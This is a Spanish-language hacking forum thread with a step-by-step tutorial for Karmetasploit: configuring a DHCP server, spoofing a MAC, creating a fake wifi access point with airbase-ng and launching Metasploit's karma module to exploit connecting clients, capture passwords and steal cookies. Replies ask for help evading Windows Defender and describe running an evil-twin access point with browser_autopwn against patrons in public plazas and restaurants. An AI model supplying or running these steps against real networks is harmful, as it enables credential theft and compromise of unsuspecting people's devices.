Imagen


Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos [Enlace externo eliminado para invitados]

Instalamos dhcpd3-server

Código: Seleccionar todo

sudo apt-get install isc-dhcp-server
Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

Código: Seleccionar todo

#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the 
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}
Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0

Código: Seleccionar todo

airmon-ng start wlan0
Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

Código: Seleccionar todo

ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

Código: Seleccionar todo

airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0
Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

Código: Seleccionar todo

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
Ahora iniciamos mestasploit con karma.

Código: Seleccionar todo

msfconsole -r karma.rc
Al iniciar karmetasploit les aparecerá:

Imagen
Twitter: @Stuxnetr00t
Ojalá sirviera , hoy en día windows defender detecta las payload y por eso digo que hay que odiar al puto ms essentials
pero odio cóm pasan de mí y no les parece importar NADA , que alguien que sepa ruby +metasploit nos ayude A TODOS
y ponga un tuto de cómo fuckearlo (si vas a decirme algo sobre msfvenom o msfencode STOP ,ya lo he probado y nada)
RapidShare.de will permanently shut down the servers on 1. March 2010! nein ..
PD:Policia española psicópata
∩____∩
| (• ◡•)|
interesante, yo me rompí el cráneo pero conseguí la redirección wlan<>wlan (y no, no es tan sencillo como simplemente cambiar los nombres de las interfaces) y ahora puedo, por ejemplo, ir a una plaza/resto cualquiera, conectar wlan0 (el wifi pedorro de mi netbook) a la red wifi legitima, luego duplicar la red (mismo essid en airbase-ng, sin necesidad de duplicar la dirección MAC) en wlan1 -mi tarjeta wifi usb Ralink RT3070-, colocar browser_autopwn esperando quietito en mon0 y de ahí la proximidad de los clientes con mi Fake AP (¿FAP?) hace el truco: los clientes se reasocian con mi estación, y ni bien intentan navegar, el módulo fakedns ataja los queries DNS y, si coinciden con el criterio que yo establecí, y el tráfico es http, les sirve la página del browser_autopwn. si no, tienen internet normal a través de wlan0. toda la movilidad, viejo.
(MD5 checksum error.)
Responder

Volver a “Exploits”